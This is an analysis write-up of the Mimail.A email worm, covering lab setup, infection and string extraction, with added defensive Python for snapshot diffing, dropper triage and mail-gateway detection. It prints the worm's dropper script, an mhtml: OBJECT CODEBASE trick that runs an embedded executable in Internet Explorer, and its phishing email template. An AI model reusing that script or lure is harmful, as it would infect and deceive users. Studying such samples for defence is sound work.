A Closer Look at the Worm_Mimail.A

Overview

On August 1, 2003, I received several emails, apparently from my email administrator's account, informing me that my email address would be expiring and that I should read an attachment for further details.  Being suspicious, I analyzed the attachment and its effects.  This is a short overview of what I have found so far.

Table of Contents

A Closer Look at the Worm_Mimail.A
Overview
Table of Contents
The Delivery
The Tools
    BinText
    TDIMON
    Regmon
    Filemon
    Regshot
    UPX
Preparation
Infection
A Closer look at HTML
What is Videodrv.exe
Appendix A
Appendix B

The Delivery

This particular infection arrives as an email and requires the user to open the email, unzip the attached HTML file, and open it in Internet Explorer.  Figure 1 is a snapshot of that email.

Figure 1: email message

The Tools

Each description is taken from the vendor for your reference.

BinText

A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.

Vendor: Foundstone

URL: http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/bintext.htm

TDIMON

TDImon is an application that lets you monitor TCP and UDP activity on your local system. It is the most powerful tool available for tracking down network-related configuration problems and analyzing application network usage.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/freeware/tdimon.shtml

Regmon

Regmon is a Registry monitoring utility that will show you which applications are accessing your Registry, which keys they are accessing, and the Registry data that they are reading and writing - all in real-time. This advanced utility takes you one step beyond what static Registry tools can do, to let you see and understand exactly how programs use the Registry. With static tools you might be able to see what Registry values and keys changed. With Regmon you'll see how the values and keys changed.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/source/regmon.shtml

Filemon

Filemon monitors and displays file system activity on a system in real-time. Its advanced capabilities make it a powerful tool for exploring the way Windows works, seeing how applications use the files and DLLs, or tracking down problems in system or application file configurations. Filemon's timestamping feature will show you precisely when every open, read, write or delete, happens, and its status column tells you the outcome. Filemon is so easy to use that you'll be an expert within minutes. It begins monitoring when you start it, and its output window can be saved to a file for off-line viewing. It has full search capability, and if you find that you're getting information overload, simply set up one or more filters.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/source/filemon.shtml

Regshot

Regshot allows you to take a snapshot of the registry, save it, perform what ever tasks you like, and take another snapshot.  The value in this little application is that you can compare the shots taken, before and after, and analyze the differences. 

Vendor: regshot.ist.md

URL: http://regshot.ist.md/

UPX

UPX is a free, portable, extendable, high-performance executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. Your executables suffer no memory overhead or other drawbacks.

Vendor: UPX

URL: http://upx.sourceforge.net/

Preparation

A default Windows XP system running inside a VMware environment was used as the test lab.  Regmon, Filemon and TDImon were started and left running before infection, and a registry snapshot was taken using Regshot.  Once this was complete, a quick look was taken at the processes running on the system to establish a baseline.

Infection

The email was opened, the zip file was unzipped, and the HTML file was double-clicked.  Figure 2 is a screen shot of the HTML page.  Note the bottom information bar indicating that something is happening.

Figure 2: Screen Shot of Installation

During the installation, a process called 'Videodrv.exe' can be seen running.

Figure 3: Videodrv.exe

After about 5 minutes, an error message appeared on the screen.  The error message can be seen in Figure 4.

Figure 4: Error Message

When this error message appeared, the text in the HTML window about installing components disappeared, hinting that the installation had finished.

There were no other visible indications that the system had been infected.

A Closer look at HTML

Running BinText on the HTML file, or simply opening it in an editor, produced some readable lines, but most of the file is not text at all.  It opens with a short MIME-style header block and then carries a binary executable (note the 'Content-Location:File://foo.exe' and 'Content-Transfer-Encoding: binary' headers, followed by the DOS stub string 'This program cannot be run in DOS mode.'); the readable HTML and script come after the binary.  Some key lines that were visible included, at the very start of the file:

    MIME-Version: 1.0
    Content-Location:File://foo.exe
    Content-Transfer-Encoding: binary

and, after the binary, in the script:

    function malware()
    s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
    path=unescape(path);
    document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')
    setTimeout("malware()",150)

Take note of the foo.exe and "moo ha ha" lines.  Are these important?  Yes: the script takes the directory the page was opened from (document.URL up to its last backslash), then writes an <OBJECT> tag whose CODEBASE is an mhtml: URL pointing back into message.html itself, at the MIME part named File://foo.exe, that is, at the embedded executable.  The CLASSID is a dummy value of all 1s; the executable named by CODEBASE is what matters.  Each of the many identical script blocks in the file schedules a call to malware() 150 ms after it is parsed, and this is how opening the page in Internet Explorer led to the videodrv.exe process seen in Figure 3.  Appendix A is a complete BinText listing of the HTML file in its original format.

What is Videodrv.exe

When the worm was launched, a process called videodrv.exe appeared.  A closer look at the process reveals additional information and can be seen in Figure 5.

Figure 5: videodrv.exe

Regshot identified the following changes between the snapshot taken before infection and the one taken after:

C:\WINDOWS\exe.tmp

C:\WINDOWS\videodrv.exe

C:\WINDOWS\zip.tmp

This identifies three new files added to the target system that we can examine in more detail.  videodrv.exe was the primary file, as seen in Process Explorer.  Running BinText on the executable displayed mostly unintelligible garbage: the file was packed (compressed), as the next step confirmed.
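
The before/after comparison used here (Regshot for the registry, the running monitors for everything else) is easy to reproduce for the file system.  The script below is an added example and not part of the original analysis: it snapshots a directory tree by hashing every file, repeats the snapshot after an action, and reports what was added, removed or modified.  The tree and the "infection" it diffs are constructed in a temporary directory, using the same file names Regshot reported; the function names are the example's own.

```python
"""Regshot-style before/after comparison, applied to a directory tree.
Added example, not part of the original write-up.  The sample tree and the
simulated infection are constructed in a temporary directory."""
import hashlib
import os
import tempfile


def snapshot(root):
    """Map each file's path (relative to root, '/'-separated) to (sha256, size)."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = (digest, os.path.getsize(full))
    return snap


def compare(before, after):
    """Sorted lists of added, removed and modified paths between two snapshots."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return added, removed, modified


def simulate_infection(windir):
    """Constructed stand-in for the worm: drop the three files Regshot saw and
    append to an existing file so the comparison has a modification to find."""
    for name in ("videodrv.exe", "exe.tmp", "zip.tmp"):
        with open(os.path.join(windir, name), "wb") as fh:
            fh.write(b"MZ" + name.encode())
    with open(os.path.join(windir, "win.ini"), "ab") as fh:
        fh.write(b"\r\n[Fake]\r\n")


def run_demo():
    """Baseline, act, re-snapshot, diff.  Returns (added, removed, modified)."""
    with tempfile.TemporaryDirectory() as tmp:
        windir = os.path.join(tmp, "WINDOWS")
        os.makedirs(os.path.join(windir, "system32"))
        with open(os.path.join(windir, "win.ini"), "wb") as fh:
            fh.write(b"[fonts]\r\n")
        with open(os.path.join(windir, "system32", "kernel32.dll"), "wb") as fh:
            fh.write(b"MZ-placeholder")      # constructed, not a real DLL
        before = snapshot(tmp)
        simulate_infection(windir)
        after = snapshot(tmp)
        return compare(before, after)


if __name__ == "__main__":
    added, removed, modified = run_demo()
    print("added:   ", added)
    print("removed: ", removed)
    print("modified:", modified)
```

The same approach works for the registry by snapshotting key/value pairs instead of file hashes.  Hash contents rather than comparing timestamps: a file that is overwritten with its modification time preserved still changes its hash.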

UPX was the next tool used, to unpack the executable and hopefully reveal the inner workings of the file and the infection.  UPX's decompression mode (upx -d) unpacked the executable successfully; the unpacked file's section names (.text, .data, .idata) appear at the top of the listing in Appendix B, where a still-packed file would show the packer's own section names instead.  BinText was then run against the unpacked file and gave a clear view of the application.  For the full text, see Appendix B.
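
The two static steps above, picking the executable out of the MHTML-style HTML file and recognising a UPX-packed binary before reaching for upx -d, can be automated.  The script below is an added example, not code from the original write-up or from the worm: it parses the MIME part header at the top of the file, walks the PE header of the embedded executable (checking e_lfanew and the PE signature before trusting anything), reports the section names and the image's extent so it can be carved out, applies the UPX section-name heuristic, and extracts the mhtml: CODEBASE and CLSID from the script.  It runs on a sample constructed inline in the same layout BinText showed for message.html; the PE inside that sample is a synthetic header skeleton with UPX0/UPX1/.rsrc sections, not the worm's binary, and all function names are the example's own.

```python
"""Static triage of a Mimail-style message.html dropper: read the MIME part header,
locate and parse the embedded PE, flag UPX-style section names, extract the
<OBJECT CODEBASE="mhtml:..."> reference.  Added example, not the write-up's code;
the input it runs on is constructed below (the PE is a header skeleton, not the worm)."""
import re
import struct

MHTML_CODEBASE = re.compile(rb'<OBJECT\b[^>]*CODEBASE="(mhtml:[^"]*)"', re.IGNORECASE)
CLASSID = re.compile(rb'CLASSID="CLSID:([0-9A-Fa-f-]{36})"', re.IGNORECASE)

def parse_part_headers(data):
    """(headers, body_offset) for the RFC 822-style header block that opens the file."""
    end = data.find(b"\r\n\r\n")
    if end == -1:
        return {}, 0
    headers = {}
    for line in data[:end].split(b"\r\n"):
        if b":" in line:
            key, value = line.split(b":", 1)
            headers[key.strip().lower().decode("ascii", "replace")] = value.strip().decode("ascii", "replace")
    return headers, end + 4

def parse_pe(data, off):
    """Section names and end-of-raw-data offset of the PE image at off, or None if the
    DOS header / e_lfanew / 'PE\\0\\0' signature do not check out."""
    if data[off:off + 2] != b"MZ" or len(data) < off + 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
    sig = off + e_lfanew
    if e_lfanew < 0x40 or len(data) < sig + 24 or data[sig:sig + 4] != b"PE\0\0":
        return None
    nsec = struct.unpack_from("<H", data, sig + 6)[0]          # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, sig + 20)[0]     # COFF SizeOfOptionalHeader
    table = sig + 24 + opt_size                                # section table follows it
    if nsec == 0 or nsec > 96 or len(data) < table + 40 * nsec:
        return None
    sections, end = [], table + 40 * nsec
    for i in range(nsec):
        name, _vsz, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append(name.rstrip(b"\0").decode("ascii", "replace"))
        end = max(end, off + raw_ptr + raw_size)
    return {"offset": off, "sections": sections, "end": end}

def carve_embedded_pe(data, start=0):
    """First 'MZ' at or after start that parses as a PE image, or None."""
    pos = data.find(b"MZ", start)
    while pos != -1:
        pe = parse_pe(data, pos)
        if pe:
            return pe
        pos = data.find(b"MZ", pos + 1)
    return None

def is_upx_packed(sections):
    """Heuristic only: stock UPX names sections UPX0/UPX1/UPX2; names are trivially renamed."""
    return any(name.startswith("UPX") for name in sections)

def triage(data):
    headers, body = parse_part_headers(data)
    pe = carve_embedded_pe(data, body)
    return {
        "content_location": headers.get("content-location"),
        "pe_offset": pe["offset"] if pe else None,
        "pe_size": pe["end"] - pe["offset"] if pe else None,
        "sections": pe["sections"] if pe else [],
        "upx_packed": is_upx_packed(pe["sections"]) if pe else False,
        "mhtml_codebase": [m.decode("ascii", "replace") for m in MHTML_CODEBASE.findall(data)],
        "clsids": sorted({m.decode("ascii") for m in CLASSID.findall(data)}),
    }

# --- constructed sample; layout follows the BinText listing in Appendix A ---
def build_fake_pe(section_names):
    """Minimal PE32 header skeleton (DOS header, PE signature, COFF header, zeroed
    optional header, section table, filler raw data).  Not executable."""
    e_lfanew, opt_size, raw_size, first_raw = 0x80, 0xE0, 0x200, 0x200
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    dos += b"\xcd\x21This program cannot be run in DOS mode.\r\r\n$"
    dos += b"\0" * (e_lfanew - len(dos))
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x010F)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), raw_size, 0x1000 * (i + 1),
                    raw_size, first_raw + i * raw_size, 0, 0, 0, 0, 0xE0000020)
        for i, n in enumerate(section_names))
    image = dos + b"PE\0\0" + coff + b"\0" * opt_size + table
    assert len(image) <= first_raw, "too many sections for this skeleton"
    image += b"\0" * (first_raw - len(image))
    return image + b"\xcc" * (raw_size * len(section_names))

SAMPLE_HTML = (
    b'<body bgcolor=black scroll=no>\r\n<SCRIPT>\r\nfunction malware()\r\n{\r\n'
    b's=document.URL;path=s.substr(-0,s.lastIndexOf("\\\\"));\r\npath=unescape(path);\r\n'
    b"document.write(' <title>Message</title><OBJECT style=\"cursor:cross-hair\" "
    b'alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  '
    b"CODEBASE=\"mhtml:'+path+'\\\\message.html!File://foo.exe\"></OBJECT>')\r\n"
    b'}\r\nsetTimeout("malware()",150)\r\n</script>'
)

def build_sample_dropper():
    """Part header for foo.exe, the binary image, then the HTML that points back at it."""
    header = (b"MIME-Version: 1.0\r\nContent-Location:File://foo.exe\r\n"
              b"Content-Transfer-Encoding: binary\r\n\r\n")
    return header + build_fake_pe(["UPX0", "UPX1", ".rsrc"]) + SAMPLE_HTML
```

Run triage(build_sample_dropper()) to see the report.  Two caveats apply in practice.  The section-name check is only a hint: the names are eight arbitrary bytes and are routinely renamed, and samples often also damage the UPX header so that upx -d refuses to unpack them, which is when the process has to be dumped from memory instead.  And the carve trusts the section table's raw offsets; a PE that declares a PointerToRawData beyond the end of the file makes parse_pe report an end past the data, so compare the reported end with len(data) before writing the carved image out.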

In the text, we could identify the following (all quoted from the Appendix B listing):

- 'VideoDriver' immediately before 'Software\Microsoft\Windows\CurrentVersion\Run' and '\videodrv.exe': the worm registers itself under the Run key so that it starts at every logon.  Checking that key is the quickest way to confirm an infection on a live host.
- the temporary file names '\eml.tmp', '\exe.tmp', '\zip.tmp' and 'c:\tmpe.tmp', which account for the exe.tmp and zip.tmp files Regshot found, and 'message.html' and 'message.zip', the names of the attachment it builds.  The MIME header 'Content-Location:File://foo.exe' and the whole script from the HTML page are also present in the executable, so it carries the dropper page that it mails out.
- 'RegisterServiceProcess' next to 'kernel32.dll': a Windows 9x API that hides a process from the Ctrl+Alt+Del task list, evidently resolved at run time through LoadLibraryA/GetProcAddress since it does not exist on NT-based systems such as the Windows XP test machine.
- 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' together with FindFirstFileA/FindNextFileA: it locates the user's folders and enumerates files in them (what it looks for in them cannot be told from the strings alone).
- the SMTP strings 'HELO localhost', 'MAIL FROM:<%s>', 'RCPT TO:<%s>', 'MX: '%s'', 'Domain: '%s'', 'Failed to connect: '%s'' and 'hostent() error: %d', with the imports gethostbyname, connect, socket and GetNetworkParams: the worm resolves the recipient domain's mail exchanger itself and speaks SMTP directly to that server, bypassing the user's mail client and any configured relay.
- the hard-coded address 212.5.86.163 and the host name www.google.com; the strings alone do not show what each is contacted for, but the address is worth watching for in firewall logs.
- 'X-Mailer: The Bat! (v1.61)': a forged mail-client header, part of the message template reproduced below.
- 'Error creating window' beside RegisterClassA, CreateWindowExA, SetTimer and KillTimer: the process runs a hidden window with a timer, a plausible source of the error box in Figure 4.

The final point of this analysis is identifying the text of the email that started the investigation.  The format strings below are the template the worm fills in (the %s placeholders) when it sends itself:

0000589D   00474A9D      0   From: %s

000058A6   00474AA6      0   To: %s

000058AD   00474AAD      0   Reply-To: %s

000058C2   00474AC2      0   RCPT TO:<%s>

000058D1   00474AD1      0   MAIL FROM:<%s>

000058E2   00474AE2      0   HELO localhost

000058F7   00474AF7      0   admin@

000058FE   00474AFE      0   ----------%s

0000590B   00474B0B      0   %.8X%.8X

00005914   00474B14      0   X-Mailer: The Bat! (v1.61)

0000592F   00474B2F      0   X-Priority: 2 (High)

00005944   00474B44      0   Subject: your account                         %s

00005975   00474B75      0   MIME-Version: 1.0

00005987   00474B87      0   Content-Type: multipart/mixed; boundary="%s"

000059BA   00474BBA      0   Content-Type: text/plain; charset=us-ascii

000059E5   00474BE5      0   Content-Transfer-Encoding: 7bit

00005A07   00474C07      0   Hello there,

00005A15   00474C15      0   I would like to inform you about important information regarding your

00005A5B   00474C5B      0   email address. This email address will be expiring.

00005A8F   00474C8F      0   Please read attachment for details.

00005AB8   00474CB8      0   Best regards, Administrator

00005ADD   00474CDD      0   Content-Type: application/x-zip-compressed; name="message.zip"

00005B1C   00474D1C      0   Content-Transfer-Encoding: base64

00005B3E   00474D3E      0   Content-Disposition: attachment; filename="message.zip"

00005B7B   00474D7B      0   --%s--
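
The format strings above are enough to write a gateway check for the message as the worm sends it.  The code below is an added example, not the author's or the worm's code: it parses a raw RFC 822 message with Python's email package and reports which of the template's fixed values are present (the X-Mailer and X-Priority headers, the 'your account' subject with its run of padding spaces, an admin@ sender, the message.zip attachment and the body sentence about the address expiring), then gives a verdict only when several of them coincide.  Both messages it runs on are constructed here; the token after 'your account' stands in for the template's %s, whose real content is not shown on this page.

```python
"""Mail-gateway style check for the message Mimail.A sends.  Added example, not
from the original write-up: the indicators are the literal values in the worm's
SMTP/MIME format strings.  Both messages below are constructed."""
import email
import re
from email import policy

EXPECTED_X_MAILER = "The Bat! (v1.61)"


def mimail_indicators(raw):
    """List the template indicators present in one raw RFC 822 message (bytes).
    Header whitespace is normalised because the Subject template pads
    'your account' with a run of spaces before its %s."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    if (msg.get("X-Mailer") or "").strip() == EXPECTED_X_MAILER:
        hits.append("x-mailer")
    if (msg.get("X-Priority") or "").strip().startswith("2"):
        hits.append("x-priority")
    subject = re.sub(r"\s+", " ", msg.get("Subject") or "").strip().lower()
    if subject.startswith("your account"):
        hits.append("subject")
    if re.search(r"(^|[<\s])admin@", str(msg.get("From") or ""), re.IGNORECASE):
        hits.append("from-admin")
    body, attachments = "", []
    for part in msg.walk():
        if part.get_content_disposition() == "attachment" or \
                part.get_content_type() == "application/x-zip-compressed":
            attachments.append((part.get_filename() or "").lower())
        elif part.get_content_type() == "text/plain":
            body += part.get_content()
    if "message.zip" in attachments:
        hits.append("attachment-message.zip")
    if "this email address will be expiring" in body.lower():
        hits.append("body-expiring")
    return hits


def is_mimail_like(raw, minimum=3):
    """Verdict on several template indicators together, never on a single header."""
    return len(mimail_indicators(raw)) >= minimum


# Constructed from the template strings; "0123ABCD89ABCDEF" stands in for the
# "%.8X%.8X" boundary token and "zzxyq" for the Subject's trailing %s.
BOUNDARY = "----------0123ABCD89ABCDEF"
SAMPLE_WORM_MAIL = (
    "From: admin@example.test\r\n"
    "To: victim@example.test\r\n"
    "Reply-To: admin@example.test\r\n"
    "X-Mailer: The Bat! (v1.61)\r\n"
    "X-Priority: 2 (High)\r\n"
    "Subject: your account                         zzxyq\r\n"
    "MIME-Version: 1.0\r\n"
    f'Content-Type: multipart/mixed; boundary="{BOUNDARY}"\r\n'
    "\r\n"
    f"--{BOUNDARY}\r\n"
    "Content-Type: text/plain; charset=us-ascii\r\n"
    "Content-Transfer-Encoding: 7bit\r\n"
    "\r\n"
    "Hello there,\r\n"
    "\r\n"
    "I would like to inform you about important information regarding your\r\n"
    "email address. This email address will be expiring.\r\n"
    "Please read attachment for details.\r\n"
    "\r\n"
    "Best regards, Administrator\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Type: application/x-zip-compressed; name="message.zip"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    'Content-Disposition: attachment; filename="message.zip"\r\n'
    "\r\n"
    "UEsDBAoAAAAAAA==\r\n"           # constructed: just a zip local-header prefix
    f"--{BOUNDARY}--\r\n"
).encode("ascii")

SAMPLE_BENIGN_MAIL = (
    "From: alice@example.test\r\n"
    "To: bob@example.test\r\n"
    "Subject: lunch?\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=us-ascii\r\n"
    "\r\n"
    "Same place at noon?\r\n"
).encode("ascii")

if __name__ == "__main__":
    print("worm sample:  ", mimail_indicators(SAMPLE_WORM_MAIL))
    print("benign sample:", mimail_indicators(SAMPLE_BENIGN_MAIL))
```

The SMTP strings are the other half of the picture: 'HELO localhost', 'MAIL FROM', 'RCPT TO' and 'MX: '%s'' show that the worm resolves the recipient's mail exchanger and delivers directly, so a workstation opening TCP port 25 connections to anything other than the organisation's own relay is a network-level indicator that does not depend on the message content at all.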

Further analysis will be completed at a later date!

Appendix A

File pos   Mem pos      ID   Text

========   =======      ==   ====

00000000   00000000      0   MIME-Version: 1.0

00000012   00000012      0   Content-Location:File://foo.exe

00000032   00000032      0   Content-Transfer-Encoding: binary

000000A2   000000A2      0   !This program cannot be run in DOS mode.

00000340   00000340      0   /t:VU

00000354   00000354      0   (x1%Sr

00000663   00000663      0   [vxf.

000007DE   000007DE      0   u#);sG

00000892   00000892      0   dgeQW

0000096E   0000096E      0   KF8"t!*

0000097E   0000097E      0   H1!9lF

00000AAE   00000AAE      0   =aS S

00000D85   00000D85      0   X= c%

00000DAF   00000DAF      0   N        \$(S#

00001034   00001034      0   {*_h      

00001074   00001074      0   W 7C3

0000120D   0000120D      0   $2V)mXl!

0000165F   0000165F      0   J xA xo

00001684   00001684      0   f t|0

000016E8   000016E8      0   nw7Gm

0000171D   0000171D      0   , 'QG

00001947   00001947      0   }f@'WY

00001982   00001982      0   SJ6]@

0000199A   0000199A      0   (sdsC

00001A80   00001A80      0   14,Q/

00001BE7   00001BE7      0   <Ar'<

00001BF5   00001BF5      0   <\t.<

00001C27   00001C27      0   kNAlS;!v$k

00001D36   00001D36      0   XY@6n

00001E56   00001E56      0   2 (,2

00001F48   00001F48      0   ABCDEFG

00001F53   00001F53      0   HIJKLMNOPQRSTUVWXYZabcdefghijklm

00001F77   00001F77      0   nopqrstuvwxyz0123456789+/

00001F91   00001F91      0   awerio

00001F9D   00001F9D      0   pasafihokozavbnmc@

00001FB3   00001FB3      0   oe.aea7

00001FCA   00001FCA      0   SOKGC

00001FD3   00001FD3      0   ?;73/M

00001FDA   00001FDA      0   4M+'#

00001FE7   00001FE7      0   v@.15

00001FF1   00001FF1      0   <body bgcolor=black scr

00002012   00002012      0   <SCRIPT

0000201A   0000201A      0   funct

00002025   00002025      0    malw

00002031   00002031      0   s=document.URL

00002045   00002045      0   th=s.subcr(-0,

0000205D   0000205D      0   xOf("\\"));

0000206D   0000206D      0   -NefapG

00002087   00002087      0   tle>M&Hge</

000020A2   000020A2      0   FONT f

000020A9   000020A9      0   e="AG

000020E8   000020E8      0   t-0ze

000020EE   000020EE      0   2px;">Num

000020FF   000020FF      0   wOBJECT

00002114   00002114      0   &-hair

00002128   00002128      0   CLASSID

00002148   00002148      0   nEJhtml:'+=+'X

00002177   00002177      0   }etTi/o

00002190   00002190      0   [ipt>

00002196   00002196      0   MIME-V

0000219D   0000219D      0   s) 1.0

000021B6   000021B6      0   Transf9-

000021D2   000021D2      0   VidyDav

000021DF   000021DF      0   on}\Mi*n

000021EB   000021EB      0   \Wxows\CArJ

000021FF   000021FF      0   \v:drvk

0000220B   0000220B      0   =C:\P5gkm

0000223E   0000223E      0   \e%.)

00002249   00002249      0   xezipRegis

00002267   00002267      0   l32.dw

00002273   00002273      0   apd 5]n

00002281   00002281      0   '%s'WF-m

00002295   00002295      0   6Nply-

000022C8   000022C8      0   MXbDa

000022E6   000022E6      0   LINEw1

00002337   00002337      0   \ShGl

00002350   00002350      0   45-3li

00002382   00002382      0   psh[h

00002388   00002388      0   [Lx"x

000023BD   000023BD      0   5.8636<2

000023CF   000023CF      0   5QUIT

000023E4   000023E4      0   GDATA$RCP-{

00002404   00002404      0   HELO

0000242F   0000242F      0    B6! (v

000024A5   000024A5      0   iiM7b

000024DF   000024DF      0   Y;gxfh

00002564   00002564      0   64!D{   

000025F1   000025F1      0   hXZl+

0000261F   0000261F      0   <HPU;\

0000265F   0000265F      0   (8DP\p4M

000026A8   000026A8      0    ,8DA$

000026B5   000026B5      0   BJvvc

000026BC   000026BC      0   U6p"4LG

000026D6   000026D6      0   fF}bH

000026DF   000026DF      0   q+VdH

000026F4   000026F4      0   nGCa(

0000271A   0000271A      0   wK[FC

00002722   00002722      0   Jz/I7@

00002744   00002744      0   +{RA7ZT

00002751   00002751      0   [+LWOD@.

000027BF   000027BF      0   ToDosDat

000027E3   000027E3      0   GetCom

000027FE   000027FE      0   H ?Cll

00002832   00002832      0   Yopymv

00002850   00002850      0     tlUn

0000288A   0000288A      0   EnumValuwg

000028A5   000028A5      0   S?']A2

000028B0   000028B0      0   _KMgth

000028DC   000028DC      0   .Ppctf

000028F4   000028F4      0   cp,r[

00002910   00002910      0   <ymppy

0000291C   0000291C      0   n(n!n"

00002958   00002958      0   sPs2KL"

000029E6   000029E6      0   WSAnLZ

00002A12   00002A12      0   [hton

00002D6D   00002D6D      0   KERNEL32.DLL

00002D7A   00002D7A      0   ADVAPI32.DLL

00002D87   00002D87      0   CRTDLL.DLL

00002D92   00002D92      0   GDI32.DLL

00002D9C   00002D9C      0   iphlpapi.DLL

00002DA9   00002DA9      0   ole32.DLL

00002DB3   00002DB3      0   OLEAUT32.DLL

00002DC0   00002DC0      0   USER32.DLL

00002DCB   00002DCB      0   wsock32.dll

00002DD9   00002DD9      0   LoadLibraryA

00002DE7   00002DE7      0   GetProcAddress

00002DF7   00002DF7      0   ExitProcess

00002E05   00002E05      0   RegCloseKey

00002E19   00002E19      0   GetStockObject

00002E29   00002E29      0   GetNetworkParams

00002E3B   00002E3B      0   CoInitialize

00002E49   00002E49      0   SysAllocString

00002E59   00002E59      0   SetTimer

00003075   00003075      0   <body bgcolor=black scroll=no>

00003094   00003094      0   <SCRIPT>

0000309D   0000309D      0   function malware()

000030B2   000030B2      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000030E8   000030E8      0   path=unescape(path);

000030FD   000030FD      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003267   00003267      0   setTimeout("malware()",150)

00003284   00003284      0   </script><body bgcolor=black scroll=no>

000032AC   000032AC      0   <SCRIPT>

000032B5   000032B5      0   function malware()

000032CA   000032CA      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003300   00003300      0   path=unescape(path);

00003315   00003315      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000347F   0000347F      0   setTimeout("malware()",150)

0000349C   0000349C      0   </script><body bgcolor=black scroll=no>

000034C4   000034C4      0   <SCRIPT>

000034CD   000034CD      0   function malware()

000034E2   000034E2      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003518   00003518      0   path=unescape(path);

0000352D   0000352D      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003697   00003697      0   setTimeout("malware()",150)

000036B4   000036B4      0   </script><body bgcolor=black scroll=no>

000036DC   000036DC      0   <SCRIPT>

000036E5   000036E5      0   function malware()

000036FA   000036FA      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003730   00003730      0   path=unescape(path);

00003745   00003745      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000038AF   000038AF      0   setTimeout("malware()",150)

000038CC   000038CC      0   </script><body bgcolor=black scroll=no>

000038F4   000038F4      0   <SCRIPT>

000038FD   000038FD      0   function malware()

00003912   00003912      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003948   00003948      0   path=unescape(path);

0000395D   0000395D      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003AC7   00003AC7      0   setTimeout("malware()",150)

00003AE4   00003AE4      0   </script><body bgcolor=black scroll=no>

00003B0C   00003B0C      0   <SCRIPT>

00003B15   00003B15      0   function malware()

00003B2A   00003B2A      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003B60   00003B60      0   path=unescape(path);

00003B75   00003B75      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003CDF   00003CDF      0   setTimeout("malware()",150)

00003CFC   00003CFC      0   </script><body bgcolor=black scroll=no>

00003D24   00003D24      0   <SCRIPT>

00003D2D   00003D2D      0   function malware()

00003D42   00003D42      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003D78   00003D78      0   path=unescape(path);

